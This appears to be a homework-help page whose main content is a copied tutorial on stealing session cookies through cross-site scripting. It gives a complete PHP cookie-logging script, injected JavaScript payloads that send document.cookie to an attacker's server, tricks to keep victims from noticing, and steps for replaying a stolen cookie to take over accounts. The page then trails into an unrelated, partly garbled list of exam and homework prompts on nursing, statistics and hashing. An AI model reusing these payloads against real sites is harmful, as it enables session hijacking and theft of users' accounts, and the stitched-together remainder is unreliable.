Provide an example input that could be used to steal a user’s cookie data given a Cross-Site Scripting vulnerability.
Cookie stealing is when you insert a script into the page so
that everyone that views the modified page inadvertently sends you
their session cookie. By modifying your session cookie , you can
impersonate any user who viewed the modified page. So how do you
use XSS to steal cookies?
The easiest way is to use a three-step process consisting of the
injected script, the cookie recorder, and the log file.
First you'll need to get an account on a server and create two
files, log.txt and whateveryouwant.php. You can leave log.txt
empty. This is the file your cookie stealer will write to. Now
paste this php code into your cookie stealer script
(whateveryouwant.php):
<?php function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="log.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>"); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); ?>
This script will record the cookies of every user that views
it.
Now we need to get the vulnerable page to access this script. We
can do that by modifying our earlier injection:
"><script language= "JavaScript">document.location="http://yoursite.com/whateveryouwant.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script>
yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened. Note that this injection will only work properly if you aren't actually modifying the page source on the server's end. Otherwise the unmodified page will actually be the modified page and you'll end up in an endless loop. While this is a working solution, we could eliminate this potential issue when using source-modifying injections by having the user click a link that redirects them to our stealer:
"><a href="#" onclick="document.location='http://yoursite.com/whateveryouwant.php?cookie=' +escape(document.cookie);"><Click Me></a></script>
This will eliminate the looping problem since the user has to cilck on it for it to work, and it's only a one-way link. Of course, then the user's trail ends at your cookie stealing script, so you'd need to modify that code a little to keep them from suspecting what's going on. You Could just add some text to the page saying something like "under construction" by changing the end of our php script from this:
logData(); ?>
to this:
logData(); echo '<b>Page Under Construction</b>' ?>
Now when you open log.txt, you should see something like this:
IP: 125.16.48.169 | PORT: 56840 | HOST: | Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD: | REF: http://www.ifa.org.nz/search.php | DATE: Tuesday 21st 2009f April 2009 05:04:07 PM | COOKIE: cookie=PHPSESSID=889c6594db2541db1666cefca7537373
You will most likely see many other fields besides PHPSESSID, but this one is good enough for this example. Open up firebug and add/modify all your cookie's fields to match the data from the cookie in your log file and refresh the page. The server thinks you're the user you stole the cookie from. This way you can log into accounts and many other things without even needing to know the passwords or usernames.
1 upload the cookie stealer php file and log file to your
server.
2 Insert the injection into the page via the url or text box.
3. Grab the link of that page with your exploited search query (if
injection is not stored on the server's copy of the page).
4. Get someone to use that link if necessary.
5. Check your log file for their cookie.
6. Modify your own cookie to match the captured one and refresh the
page.
References
http://techmafias.com/forum/Thread-tutorial-cookie-stealing-with-xss
Provide an example input that could be used to steal a user’s cookie data given a...
A developer emails the following output to a security administrator for review Cookie serbadguy path; tponly Which of the following tools might the security administrator use to perform further security assessment of this issue? Port Scanner Vulnerability scanner HTTP Interceptor A securnynoncer successfully explots an application during a penetration test As proof of the exploit the security engineer takes screenshots of how data was compromised in the application Given the information below from the screenshot 2013-11-21 13:11 5 root https://company.com/store...
Provide an example how the theory could be used to improve or evaluate the quality of practice in nursing education?
Provide an example how the theory could be used to improve or evaluate the quality of practice in nursing education (educator).
How is data used to evaluate outcomes? Provide an example as it relates to an area of nursing.
How is data used to evaluate outcomes? Provide an example as it relates to an area of nursing
What is an ethical dilemma? Provide an example of an ethical dilemma that could occur in your research project as you are using and reporting data. Discuss how you will respond to this ethical dilemma to maintain the ethical integrity for your project.
What is an ethical dilemma? Provide an example of an ethical dilemma that could occur in your research project as you are using and reporting data. Discuss how you will respond to this ethical dilemma to maintain the ethical integrity for your project. ** EHR SYSTEM **
Provide one real world example where hashing was used as a security measure. Be sure to provide a source to validate your example. After you have provided an example you are to answer two questions: 1: Why did hashing work as a security measure in this instance? 2: What could have been done to defeat the hashing by hackers?
Graphical displays are used to provide the viewer information that illustrates qualitative or quantitative information about the data set under review. After reading the assigned sections in Chapter 2, please provide an example of where you think a graphical display could be used incorrectly. What ramification(s) do you think could result from the graphical display in your example being used incorrectly?
Could you please explain the difference between :Continuous, Numerical, Categorical, Discrete data and provide an simple example for them?